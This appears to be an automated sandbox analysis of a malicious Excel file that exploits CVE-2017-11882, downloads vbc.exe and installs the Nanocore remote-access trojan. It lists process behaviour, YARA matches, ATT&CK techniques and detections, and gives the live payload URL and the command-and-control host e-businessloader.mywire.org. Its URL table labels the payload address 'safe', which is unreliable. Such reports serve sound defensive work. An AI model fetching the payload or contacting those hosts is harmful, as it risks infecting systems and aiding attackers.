Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWindow / User API: threadDelayed 1957
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWindow / User API: foregroundWindowGot 386
Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeThread delayed: delay time: 922337203685477
Source: sys30.exe, 00000007.00000002.698161367.0000000006149000.00000004.00000001.sdmpBinary or memory string: VMware_S
Source: sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess token adjusted: Debug
Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeMemory written: C:\Users\user\AppData\Local\sys4h57g\sys30.exe base: 70000 value starts with: 4D5AJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exeJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeProcess created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmpBinary or memory string: !Progman
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeQueries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeQueries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeQueries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062C010 GetSystemTimes,9_2_0062C010
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: sys30.exe, 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation1Startup Items1Startup Items1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Valid Accounts1Extra Window Memory Injection1Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Registry Run Keys / Startup Folder2Valid Accounts1Software Packing11Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Access Token Manipulation1Timestomp1NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptProcess Injection112Extra Window Memory Injection1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder2Masquerading111Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol23Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsValid Accounts1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion21Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection112Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483371 Sample: Enclosed.xlsx Startdate: 14/09/2021 Architecture: WINDOWS Score: 100 61 e-businessloader.mywire.org 2->61 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 13 other signatures 2->75 8 sys30.exe 12 5 2->8         started        13 EQNEDT32.EXE 12 2->13         started        15 EXCEL.EXE 34 46 2->15         started        signatures3 process4 dnsIp5 65 www.google.com 8->65 49 C:\Users\user\AppData\Local\Temp\sys30s.exe, PE32 8->49 dropped 83 Machine Learning detection for dropped file 8->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->85 87 Injects a PE file into a foreign processes 8->87 17 sys30.exe 8->17         started        22 sys30s.exe 8->22         started        24 sys30s.exe 8->24         started        28 9 other processes 8->28 67 13.238.159.178, 49165, 80 AMAZON-02US United States 13->67 51 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 13->51 dropped 53 C:\Users\Public\vbc.exe, PE32 13->53 dropped 89 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->89 26 vbc.exe 12 4 13->26         started        55 C:\Users\user\Desktop\~$Enclosed.xlsx, data 15->55 dropped file6 signatures7 process8 dnsIp9 57 e-businessloader.mywire.org 194.5.98.103, 49172, 49173, 49174 DANILENKODE Netherlands 17->57 45 C:\Users\user\AppData\Roaming\...\run.dat, data 17->45 dropped 77 Multi AV Scanner detection for dropped file 22->77 30 sys30s.exe 22->30         started        32 sys30s.exe 24->32         started        59 www.google.com 172.217.168.36, 443, 49166, 49168 GOOGLEUS United States 26->59 47 C:\Users\user\AppData\Local\...\sys30.exe, PE32 26->47 dropped 79 Machine Learning detection for dropped file 26->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->81 34 sys30.exe 26->34         started        37 sys30s.exe 28->37         started        39 sys30s.exe 28->39         started        41 sys30s.exe 28->41         started        43 5 other processes 28->43 file10 signatures11 process12 dnsIp13 63 www.google.com 34->63

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Enclosed.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\sys4h57g\sys30.exe100%Joe Sandbox ML
C:\Users\Public\vbc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\sys30s.exe14%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\sys30s.exe11%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
9.2.sys30.exe.560000.3.unpack100%AviraTR/NanoCore.fadteDownload File
9.2.sys30.exe.70000.0.unpack100%AviraTR/Dropper.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://13.238.159.178/truth/vbc.exe0%Avira URL Cloudsafe
http://ns.adobe.c/s0%Avira URL Cloudsafe
http://tempuri.org/login2DataSet.xsd0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://tempuri.org/ProductDataSet.xsd0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://n.f0%Avira URL Cloudsafe
http://tempuri.org/PendingProList.xsd0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://ns.adobede0%Avira URL Cloudsafe
http://tempuri.org/ProductDataSet1.xsd#CustomerDataTableuThe0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://ns.ao0%URL Reputationsafe
